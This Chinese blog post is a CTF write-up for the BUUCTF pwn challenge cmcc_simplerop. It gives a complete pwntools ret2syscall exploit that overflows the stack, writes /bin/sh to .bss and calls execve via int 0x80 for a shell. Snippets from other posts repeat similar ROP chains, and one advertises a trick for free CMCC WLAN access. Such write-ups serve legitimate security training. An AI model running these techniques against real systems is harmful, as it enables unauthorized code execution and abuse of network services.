cmcc_simplerop

最新推荐文章于 2025-04-21 21:58:58 发布
原创 最新推荐文章于 2025-04-21 21:58:58 发布 · 515 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #网络安全 #安全

本文讲述了在cmcc_simplerop程序中发现的栈溢出漏洞,通过IDA分析找到系统调用入口,利用read函数将/bin/sh写入BSS段,最终执行shell命令的过程。关键步骤包括利用int80进行系统调用和精心构造的payload。

cmcc_simplerop

使用checksec查看:
在这里插入图片描述
嗯,只开了栈不可执行,题目已经提示是漏洞是栈溢出了。

直接放进IDA中查看:
在这里插入图片描述
很简洁,直接在主函数中给出了栈溢出的地方。

接着查看了该程序的字符串,发现这是一个静态编译的程序,而且不存在flag/bin/sh等关键字符串。

看来是不能直接getshell。但是可以发现存在int 80,这么一来,可以执行系统调用了。
在这里插入图片描述
接下来就是我们需要找一些通用的可以给寄存器赋值的命令。
在这里插入图片描述
so…因为系统调用,需要我们执行这样的命令:int80(11,"/bin/sh",null,null)
在这里插入图片描述
在这里插入图片描述
所以上面的两条命令刚刚好。

接下来就是要解决/bin/sh的问题,这道题目没有给出字符串,需要我们自己输入,这道题没有开启pie,可以考虑用read()/bin/sh写入到bss段中。

这里还有个坑,IDA中给出的距离ebp的地址是0x14,打了好几次发现不行,用gdb调试了下才发现距离是0x1c
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DGBITvPX-1638149868932)(cmcc_simplerop.assets/image-20211019232657675.png)]

payload = b'M'*(0x1c+4) + p32(read_addr) + p32(pop_pop_edx_ecx_ebx) + p32(0) + p32(binsh_addr) + p32(0x8)
payload += p32(pop_eax) + p32(0xb) + p32(pop_edx_ecx_ebx) + p32(0) + p32(0) + p32(binsh_addr) + p32(int_addr)

第一段payload是将/bin/sh写入BSS段,read函数的返回地址用三个pop代替,整好将read函数的三个参数弹出栈,这样就可以执行下面的系统调用了。

第二段就是正常的执行系统调用。

exp:

from pwn import *

#start 
r = process("../buu/cmcc_simplerop")
# r = remote("node4.buuoj.cn",27434)
elf = ELF("../buu/cmcc_simplerop")

#params 
int_80 = 0x80493e1
pop_eax = 0x80bae06
read_addr = 0x0806CD50
binsh_addr = 0x080EB584
pop_edx_ecx_ebx = 0x0806e850

payload = b'M'*(0x1c+4) + p32(read_addr) + p32(pop_edx_ecx_ebx) + p32(0) + p32(binsh_addr) + p32(0x8) + p32(pop_eax) + p32(0xb) + p32(pop_edx_ecx_ebx) + p32(0) + p32(0) + p32(binsh_addr) + p32(int_80)

#attack
r.sendline(payload)
r.sendline('/bin/sh\x00')

r.interactive()
ROP链-BUUCTF-cmcc_simplerop(ret2syscall)
Welcome To Myon'Blog !
05-08 575
当然这个地址我们也可以通过符号表来找,因为这里的程序是静态链接的 ELF 文件,所有不能通过 plt 或者 got 表,因为压根就不存在。这样后面才能正常的 ret2syscall 传参,从而系统调用 execv。但是这里还有一个问题,程序没有类似于 pop [ecx] 这样的指令。利用思路类似,建议先看完我上面的这篇博客,我这里不再过多叙述。但是 read 函数执行后,它的三个参数还在栈顶上。
BUUCTF:cmcc_simplerop(write up)
qq_44768749的博客
08-26 1107
BUUCTF:cmcc_simplerop0x01 文件分析0x02 运行0x03 IDA0x04 思路0x04-1 解法一0x04-2 解法二0x05 exp解法一解法二 0x01 文件分析 32位程序,开启NX、部分RELRO保护 0x02 运行 输入一串字符串 0x03 IDA main函数 存在栈溢出漏洞 0x04 思路 0x04-1 解法一 该题没有system函数也没有"/bin/sh",也无法泄露函数真实地址 可利用int 80h系统调用 设置系统调用参数即可执行e
BUUCTF cmcc_simplerop
BengDouLove的博客
04-14 1024
这道题打开ida又是那么一大堆一大堆的函数,也没有外部引用的段,所以就是静态链接把好多函数都链接进来了 所以就和 BUU上另一道 inndy_rop 一样,直接用ROPgadget 去找rop链 from struct import pack # Padding goes here p = '' p += pack('<I', 0x0806e82a) # pop edx ...
cmcc--simplerop
03-28
cmcc pwn题样本,可以使用多种rop方式进行漏洞利用,打开自己的思路,wp链接: https://blog.youkuaiyun.com/A951860555/article/details/115286266
pwncmcc_simplerop
Nothing
02-26 811
例行检查 ida打开二进制文件发现是静态链接的32位程序。main函数中存在溢出。用ROPgadget查找文件中的gadget。 ROPgadget --binary ./simplerop --only 'pop|ret' >> 1.txt 得到 发现存在 pop eax;ret pop edx;pop ecx;pop ebx;ret 这些就足够了,给寄存器赋值再用int 80...
CMCC-Trick:招惹CMCC-* WLAN
06-03
Trick-CMCC 利用CMCC公共热点的小漏洞免费上网~~ :) sudo ./conn.sh <CMCC> Notice: 目前只知道我工CMCC有这特色, 其他地区尚不明确 Notice: 脚本适用于使用NetWorkManager网络sds管理工具的系统 Notice: 不必惊讶原理, 简单到说出来你都不信;) Notice: 大前提是你先能连上WI-FI~~
[BUUCTF-pwn]——cmcc_simplerop (ropchain)
Y_peak的博客
03-16 678
[BUUCTF-pwn]——cmcc_simplerop 有栈溢出,自己找rop链,最简单的方法,让ROPgadget帮我们弄好呀,可是有点长,所有需要我们修改。毕竟有长度要求。因为“/bin/sh"字符串没有找到,所有这之前的都不动, 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下,其他都可以进行修改 inc就是 ++ exploit 目的:使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx
BUUCTF-PWN-cmcc_simplerop
qq_41743240的博客
04-28 564
BUUCTF-cmcc_simplerop 开了NX IDA反编译 程序非常简单,漏洞也一眼可见 程序里面没有system,这题解法非常多,这里使用mprotect方法修改bss段,执行shellcode exploit: #coding:utf-8 from pwn import * #p=process('simplerop') p=remote('node3.b...
cmcc Simplerop
Morphy_Amo的博客
03-17 4060
rop
cmcc_simplerop--buuctf
2301_81060697的博客
04-21 767
主要记录了关于32位的系统调用流程
BUUCTF----cmcc_simplerop
qq_33010875的博客
09-28 539
环境:WSL2,ubuntu16.04,python2 常规checksec文件: ida反编译: 明显看到read函数会导致栈溢出 gdb调试程序: 用cyclic指令生成100个数字,运行程序: 求输入点到返回地址的偏移: 得到偏移是32,即0x20 值得一提的是,在ida中,我们可以看到偏移是0x18+0x04=0x1c,以gdb调试为准 原因可参考: https://blog.youkuaiyun.com/mcmuyanga/article/details/109260008 文件名给了提示,使用
CMCC--simplerop 题解
lifanxin的博客
03-28 1943
Write Up文件信息漏洞定位利用分析wp总结 文件信息   该样本是我在做BUUCTF上的题刷到的,该题目本身漏洞明显,利用起来也不算太难,不过在我查阅一下他人的wp后发现了多种解法,在这里做个记录和总结。   老规矩先来检查一下文件的信息,32位小端程序,且只开启了NX保护。 漏洞定位 程序本身采用的是静态链接,所以用IDA进行分析的时候会发现.text段中的函数特别多,当然这本身也是为了配合题目给出的提示方便我们利用这么多的gadgets构造ROP链。 然后我们在IDA中定位到main函数,可以
cmcc simplerop
pondzhang的专栏
05-25 278
from pwn import * p = process('./simplerop') p.recv() int80_addr = 0x080493e1 pop_eax = 0x080bae06 read = 0x0806CD50 binsh = 0x080EB584 pop_edx_ecx_ebx = 0x0806e850 payload = 'a'*0x20 + p32(read) + p32(pop_edx_ecx_ebx) + p32(0) + p32(binsh) + p32(0x8) payl
C:\Users\25792\PycharmProjects\PythonProject\.venv\Scripts\python.exe C:\Users\25792\AppData\Roaming\JetBrains\PyCharm2025.2\scratches\scratch.py ✅ 目录存在,包含以下文件: 📄 CMCC_ESM2_SSP245_hurs_2015.nc (100 MB) 📄 CMCC_ESM2_SSP245_hurs_2016.nc (95 MB) 📄 CMCC_ESM2_SSP245_hurs_2017.nc (93 MB) 📄 CMCC_ESM2_SSP245_hurs_2018.nc (97 MB) 📄 CMCC_ESM2_SSP245_hurs_2019.nc (102 MB) 📄 CMCC_ESM2_SSP245_hurs_2020.nc (97 MB) 📄 CMCC_ESM2_SSP245_hurs_2021.nc (98 MB) 📄 CMCC_ESM2_SSP245_hurs_2022.nc (99 MB) 📄 CMCC_ESM2_SSP245_hurs_2023.nc (103 MB) 📄 CMCC_ESM2_SSP245_hurs_2024.nc (90 MB) 📄 CMCC_ESM2_SSP245_hurs_2025.nc (106 MB) 📄 CMCC_ESM2_SSP245_hurs_2026.nc (101 MB) 📄 CMCC_ESM2_SSP245_hurs_2027.nc (104 MB) 📄 CMCC_ESM2_SSP245_hurs_2028.nc (106 MB) 📄 CMCC_ESM2_SSP245_hurs_2029.nc (94 MB) 📄 CMCC_ESM2_SSP245_hurs_2030.nc (107 MB) 📄 CMCC_ESM2_SSP245_hurs_2031.nc (98 MB) 📄 CMCC_ESM2_SSP245_hurs_2032.nc (105 MB) 📄 CMCC_ESM2_SSP245_hurs_2033.nc (98 MB) 📄 CMCC_ESM2_SSP245_hurs_2034.nc (96 MB) 📄 CMCC_ESM2_SSP245_hurs_2035.nc (102 MB) 📄 CMCC_ESM2_SSP245_hurs_2036.nc (99 MB) 📄 CMCC_ESM2_SSP245_hurs_2037.nc (97 MB) 📄 CMCC_ESM2_SSP245_hurs_2038.nc (97 MB) 📄 CMCC_ESM2_SSP245_hurs_2039.nc (100 MB) 📄 CMCC_ESM2_SSP245_hurs_2040.nc (96 MB) 📄 CMCC_ESM2_SSP245_hurs_2041.nc (87 MB) 📄 CMCC_ESM2_SSP245_hurs_2042.nc (94 MB) 📄 CMCC_ESM2_SSP245_hurs_2043.nc (99 MB) 📄 CMCC_ESM2_SSP245_hurs_2044.nc (88 MB) 📄 CMCC_ESM2_SSP245_hurs_2045.nc (102 MB) 📄 CMCC_ESM2_SSP245_hurs_2046.nc (89 MB) 📄 CMCC_ESM2_SSP245_hurs_2047.nc (97 MB) 📄 CMCC_ESM2_SSP245_hurs_2048.nc (98 MB) 📄 CMCC_ESM2_SSP245_hurs_2049.nc (95 MB) 📄 CMCC_ESM2_SSP245_hurs_2050.nc (98 MB) 📄 CMCC_ESM2_SSP245_hurs_2051.nc (108 MB) 📄 CMCC_ESM2_SSP245_hurs_2052.nc (93 MB) 📄 CMCC_ESM2_SSP245_hurs_2053.nc (99 MB) 📄 CMCC_ESM2_SSP245_hurs_2054.nc (104 MB) 📄 CMCC_ESM2_SSP245_hurs_2055.nc (99 MB) 📄 CMCC_ESM2_SSP245_hurs_2056.nc (94 MB) 📄 CMCC_ESM2_SSP245_hurs_2057.nc (93 MB) 📄 CMCC_ESM2_SSP245_hurs_2058.nc (92 MB) 📄 CMCC_ESM2_SSP245_hurs_2059.nc (105 MB) 📄 CMCC_ESM2_SSP245_hurs_2060.nc (94 MB) 📄 CMCC_ESM2_SSP245_hurs_2061.nc (91 MB) 📄 CMCC_ESM2_SSP245_hurs_2062.nc (94 MB) 📄 CMCC_ESM2_SSP245_hurs_2063.nc (96 MB) 📄 CMCC_ESM2_SSP245_hurs_2064.nc (90 MB) 📄 CMCC_ESM2_SSP245_hurs_2065.nc (95 MB) 📄 CMCC_ESM2_SSP245_hurs_2066.nc (103 MB) 📄 CMCC_ESM2_SSP245_hurs_2067.nc (102 MB) 📄 CMCC_ESM2_SSP245_hurs_2068.nc (100 MB) 📄 CMCC_ESM2_SSP245_hurs_2069.nc (96 MB) 📄 CMCC_ESM2_SSP245_hurs_2070.nc (89 MB) 📄 CMCC_ESM2_SSP245_hurs_2071.nc (101 MB) 📄 CMCC_ESM2_SSP245_hurs_2072.nc (100 MB) 📄 CMCC_ESM2_SSP245_hurs_2073.nc (97 MB) 📄 CMCC_ESM2_SSP245_hurs_2074.nc (98 MB) 📄 CMCC_ESM2_SSP245_hurs_2075.nc (108 MB) 📄 CMCC_ESM2_SSP245_hurs_2076.nc (91 MB) 📄 CMCC_ESM2_SSP245_hurs_2077.nc (94 MB) 📄 CMCC_ESM2_SSP245_hurs_2078.nc (97 MB) 📄 CMCC_ESM2_SSP245_hurs_2079.nc (93 MB) 📄 CMCC_ESM2_SSP245_hurs_2080.nc (92 MB) 📄 CMCC_ESM2_SSP245_hurs_2081.nc (104 MB) 📄 CMCC_ESM2_SSP245_hurs_2082.nc (99 MB) 📄 CMCC_ESM2_SSP245_hurs_2083.nc (99 MB) 📄 CMCC_ESM2_SSP245_hurs_2084.nc (107 MB) 📄 CMCC_ESM2_SSP245_hurs_2085.nc (97 MB) 📄 CMCC_ESM2_SSP245_hurs_2086.nc (97 MB) 📄 CMCC_ESM2_SSP245_hurs_2087.nc (100 MB) 📄 CMCC_ESM2_SSP245_hurs_2088.nc (105 MB) 📄 CMCC_ESM2_SSP245_hurs_2089.nc (97 MB) 1.7.2 进程已结束,退出代码为 0
最新发布
09-22
'D:\\10KM中国全域数据\\CMCC_ESM2_SSP245_hurs\\CMCC_ESM2_SSP245_hurs_2025.nc' ``` 但现在我们确认: - ✅ 文件存在 - ✅ 路径拼写一致 **这说明最可能的原因是:Python 脚本运行时的工作目录或路径编码出现了...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值